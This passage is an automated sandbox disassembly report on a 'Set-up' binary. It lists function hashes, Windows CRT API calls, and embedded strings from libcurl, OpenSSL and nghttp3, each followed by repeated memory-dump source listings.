                          • API String ID: 542397150-344804083
                          • Opcode ID: c19bdd41e9e0c656109602275f9d9a044de7fe26b3eecfc4e1bd2a0e6c61e063
                          • Instruction ID: 41cc8ee4c2b3635957c943a763193a4b76e1a86ee26bb5012166a22366d25c9f
                          • Opcode Fuzzy Hash: c19bdd41e9e0c656109602275f9d9a044de7fe26b3eecfc4e1bd2a0e6c61e063
                          • Instruction Fuzzy Hash: BE8182B1500B05AFE3239F28E885BE2B7E0FB5030CF444E19E6D9873A5DB79A524CB51
                          APIs
                            • Part of subcall function 000273F0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,#HttpOnly_,?,0002CA95,0059DE58,00000467,mprintf.c), ref: 0002741D
                            • Part of subcall function 000273F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000008,?,00000001), ref: 00027445
                            • Part of subcall function 000647D0: fgets.API-MS-WIN-CRT-STDIO-L1-1-0(00000080,00000080,?), ref: 000647FB
                            • Part of subcall function 000647D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0006480C
                            • Part of subcall function 000647D0: feof.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00064837
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00026844
                          • memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,unlimited,0000000A), ref: 00026876
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 000268FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen$feoffgetsmemcmpmemcpy
                          • String ID: %256s "%64[^"]"$hsts.c$unlimited
                          • API String ID: 288886899-2895786126
                          • Opcode ID: ef2f7653c5b998d75698ba903ea8df76a7c37d533c26725cf53e5b0e71f961f2
                          • Instruction ID: f1e8a5bb5f07859e74a7170789e1b7f07cef80b8f3fc5c0412225f3cfab22304
                          • Opcode Fuzzy Hash: ef2f7653c5b998d75698ba903ea8df76a7c37d533c26725cf53e5b0e71f961f2
                          • Instruction Fuzzy Hash: F7514D71E483617BDB209B20BC42E6B7AD9AF55704F144928FC48962C3FE32DA14C793
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00219265,?,00000400,00000000,?), ref: 00218254
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00219265,?), ref: 00218264
                          • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00219265,?,?,?,?,?,?,00219265,?,00000400,00000000,?), ref: 002182C7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpymemsetstrlen
                          • String ID: Enter PEM pass phrase:$PEM_def_callback$crypto/pem/pem_lib.c
                          • API String ID: 160209724-3271887637
                          • Opcode ID: bc30b3502cbe2e7c83dc0af40af474a7fd03452f0fb1176eba9307391726e537
                          • Instruction ID: ba9ba3c565108c9d3e60c76c2cf3d1df550422335dffc70a81d63fc393c84ffb
                          • Opcode Fuzzy Hash: bc30b3502cbe2e7c83dc0af40af474a7fd03452f0fb1176eba9307391726e537
                          • Instruction Fuzzy Hash: B201F9A2B0031177E211AA647CC3F6F268DCB92750F040536FE04962C2FB519C1551F2
                          APIs
                          • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,00000000,?,?,00055B6B,00000017,?,?), ref: 00084612
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789abcdef,?,00000011), ref: 00084660
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _errnomemchr
                          • String ID: 0123456789ABCDEF$0123456789abcdef
                          • API String ID: 4119152314-885041942
                          • Opcode ID: 0ee84ea6770a9d3539c1ae7902b96c6f9adb800335bdbca5c8b8c17b9f22f9b6
                          • Instruction ID: 943c8b83cc8a5dd47dd37d258aa846330682ee78f05f24454c623de69c47bea6
                          • Opcode Fuzzy Hash: 0ee84ea6770a9d3539c1ae7902b96c6f9adb800335bdbca5c8b8c17b9f22f9b6
                          • Instruction Fuzzy Hash: 5091D375A0C3528BD728EE28C85027EB7D2FFD6314F198A2DE8D587381EB759D848742
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0007225F
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 000722CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64strlen
                          • String ID: :%u$Hostname in DNS cache does not have needed family, zapped$Hostname in DNS cache was stale, zapped
                          • API String ID: 3014104814-1335658360
                          • Opcode ID: e828b399bf2dc24a232baaff93fa0d84b1274f55657d9416a8a881ff7cf378d4
                          • Instruction ID: 571b42c369fecedb9336e63f69a647f0add497b1b3f0adee0c60217aa2e35ab5
                          • Opcode Fuzzy Hash: e828b399bf2dc24a232baaff93fa0d84b1274f55657d9416a8a881ff7cf378d4
                          • Instruction Fuzzy Hash: EE410571E003045BD7649A24DC85BBBB7D5EF84314F08C43CEA9E8B283E639ED558795
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx > absidx,nghttp3_qpack.c,000008B6,?,?,000D0307,?), ref: 000D07AE
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable),nghttp3_qpack.c,000008B7,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000D07C3
                          Strings
                          • nghttp3_qpack.c, xrefs: 000D07A4, 000D07B9
                          • ctx->next_absidx > absidx, xrefs: 000D07A9
                          • ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable), xrefs: 000D07BE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: ctx->next_absidx - absidx - 1 < nghttp3_ringbuf_len(&ctx->dtable)$ctx->next_absidx > absidx$nghttp3_qpack.c
                          • API String ID: 1222420520-241347991
                          • Opcode ID: 230a523dac27180e15b243187a694afaf8ef6add0bd3a088d3652075a1aee32a
                          • Instruction ID: 7f5f53677349eb90c697ddcebdbe36d6899711a7de61cb77ce66e731ac4c46e9
                          • Opcode Fuzzy Hash: 230a523dac27180e15b243187a694afaf8ef6add0bd3a088d3652075a1aee32a
                          • Instruction Fuzzy Hash: BC31C475B00704ABD310AB28DC81F6F73A9BF89714F04853CF48987342EA21F85187A5
                          APIs
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00035FB6,?), ref: 003A4645
                          • _stat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(../list/public_suffix_list.dat,?), ref: 003A4698
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,006A5618), ref: 003A4744
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 003A4762
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _stat64$fclosefopen
                          • String ID: ../list/public_suffix_list.dat
                          • API String ID: 1085753941-141370353
                          • Opcode ID: 476cc60ee2cbc7f31baf190724b278dc35993e1046d3059e2f817bb455a77487
                          • Instruction ID: 8f52bfeb6c43eb75483380c75054582266f5613827469b94e45cdf834f557d6a
                          • Opcode Fuzzy Hash: 476cc60ee2cbc7f31baf190724b278dc35993e1046d3059e2f817bb455a77487
                          • Instruction Fuzzy Hash: 6C41AFB2A083419BC701DF18D58076AB7EAEBC7754F16482CE8D5DB250E7B1ED48CB92
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00092771
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64
                          • String ID: Connection time-out$gfff$netascii$set timeouts for state %d; Total % lld, retry %d maxtry %d
                          • API String ID: 1670930206-2395985473
                          • Opcode ID: 5c675fed17aae6b355d5c48d82fc88f33853ae5138fafce80bd16e7466239c0c
                          • Instruction ID: 0f81db0f631ddcf2c92021c1433d0d5782b660f59e33f456995253d140f42658
                          • Opcode Fuzzy Hash: 5c675fed17aae6b355d5c48d82fc88f33853ae5138fafce80bd16e7466239c0c
                          • Instruction Fuzzy Hash: 60214CB1B003002FEB289A29EC06F2779DAEBC0304F18893DF94ACB282F571D8009651
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(veccnt > 0,nghttp3_stream.c,0000033D), ref: 000C6119
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == offset,nghttp3_stream.c,00000349), ref: 000C612E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: 0 == offset$nghttp3_stream.c$veccnt > 0
                          • API String ID: 1222420520-3888743547
                          • Opcode ID: 194319155555d8b6ca1f7f3c512a4bf0118b80897695ee4b7aa02e3979f758be
                          • Instruction ID: af198cb78e8ced20b46c690274edf779590b240ee237767b1564e9cec5567d60
                          • Opcode Fuzzy Hash: 194319155555d8b6ca1f7f3c512a4bf0118b80897695ee4b7aa02e3979f758be
                          • Instruction Fuzzy Hash: 4D31E2715042048FC714EF54D885FABB7E5FF88318F1585BCE98A6B252E632AD41CB91
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(n <= balloc->blklen,nghttp3_balloc.c,00000042,?,00000000,?,000C4D5A,00000000,?,000001F0), ref: 000C8861
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(((uintptr_t)balloc->buf.last & 0xfu) == 0,nghttp3_balloc.c,00000055,?,000001F0), ref: 000C8873
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: ((uintptr_t)balloc->buf.last & 0xfu) == 0$n <= balloc->blklen$nghttp3_balloc.c
                          • API String ID: 1222420520-3025919285
                          • Opcode ID: a3f6f895e7840402dd76e24c78bc9b5a5816b40ee75a862e5f21a4945ce97fe4
                          • Instruction ID: 2e9678e2b3ac8c64eb839f70c9fe5b873668027412f24e6f266e9ff2ee8bed79
                          • Opcode Fuzzy Hash: a3f6f895e7840402dd76e24c78bc9b5a5816b40ee75a862e5f21a4945ce97fe4
                          • Instruction Fuzzy Hash: 9C11CCB6A40711ABD7008F64EC46E99B775FF41721B088628F414977D2DB30F864C7E4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: application/octet-stream$formdata.c
                          • API String ID: 0-1216067158
                          • Opcode ID: 81d65d3e8c37e3479e0a9830e4133c418ca83f7fed504e9d3522d954940085af
                          • Instruction ID: c1b457d85314e1963263f1b71d8a0121f343d72edcbfe58f8bf6b89e3e036db5
                          • Opcode Fuzzy Hash: 81d65d3e8c37e3479e0a9830e4133c418ca83f7fed504e9d3522d954940085af
                          • Instruction Fuzzy Hash: 5302E5B0A08B608BE774CF14ED8172ABBD1BF94304F59492DD88A4B792E771E885CB45
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 002C46DD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlen
                          • String ID: ASN1_mbstring_ncopy$crypto/asn1/a_mbstr.c$maxsize=%ld$minsize=%ld
                          • API String ID: 39653677-2338284442
                          • Opcode ID: ed5f58eb06afff2c4a0ef389b70f92e20c6a8b93edd94758c15ea5c2be581ab0
                          • Instruction ID: f93853c708f15562f6760b8cc1d3c43d0ae015bfe123bae4141d9c7d6ba28cc8
                          • Opcode Fuzzy Hash: ed5f58eb06afff2c4a0ef389b70f92e20c6a8b93edd94758c15ea5c2be581ab0
                          • Instruction Fuzzy Hash: 4BA1F771B687026BE720BE149C72F2B7391AB90704F14472DFD465B3C6E7B1D8248696
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID: .%lu$crypto/objects/obj_dat.c
                          • API String ID: 0-3322715555
                          • Opcode ID: 108912cfa50bdc4513b18b08d9829f616ed0d0ceee59db08c85cab1dc316db50
